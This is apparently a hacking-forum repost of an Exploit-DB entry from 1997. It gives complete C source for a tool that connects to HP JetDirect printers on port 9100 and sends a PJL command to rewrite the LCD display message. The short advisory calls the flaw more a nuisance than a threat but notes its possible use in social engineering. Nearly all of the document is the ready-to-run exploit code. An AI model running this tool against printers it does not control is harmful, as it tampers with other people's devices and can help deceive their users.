Exploit HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A - LCD Display Modification

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20565
Проверка EDB
  1. Пройдено
Автор
SILI
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
null
Дата публикации
1997-12-08
C:
/*
source: https://www.securityfocus.com/bid/2245/info

Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. 
*/

/*
   HP Printer Hack
   12/8/97 [email protected]
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>

#define PORT 9100

int main (int argc, char *argv[]) {

  int sockfd,len,bytes_sent;   /* Sock FD */
  struct hostent *host;   /* info from gethostbyname */
  struct sockaddr_in dest_addr;   /* Host Address */
  char line[100];

  if (argc !=3) {
    printf("HP Display Hack\[email protected] 12/8/97\n\n%s printer \"message\"\n",argv[0]);
    printf("\tMessage can be up to 16 characters long\n");
    exit(1);
  }

  if ( (host=gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(1);
  }

  printf ("HP Display hack -- [email protected]\n");
  printf ("Hostname:   %s\n", argv[1]);
  printf ("Message: %s\n",argv[2]);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(PORT) ; /* PORT defined above */

  /* Prepare dest_addr */
  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

  bzero(&(dest_addr.sin_zero), 8);  /* Take care of  sin_zero  ??? */


  /* Get socket */
/*  printf ("Grabbing socket....\n"); */
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
  }

  /* Connect !*/

  printf ("Connecting....\n");

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);}

  /* Preparing JPL Command */

  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
  strncat(line,argv[2],16);
  strcat(line,"\"\r\n\033%-12345X\r\n");

  /* Sending data! */

/*  printf ("Sending Data...%d\n",strlen(line));*/
/*  printf ("Line: %s\n",line); */
  bytes_sent=send(sockfd,line,strlen(line),0);

  printf("Sent %d bytes\n",bytes_sent);
  close(sockfd);
}
 
Источник
www.exploit-db.com

Похожие темы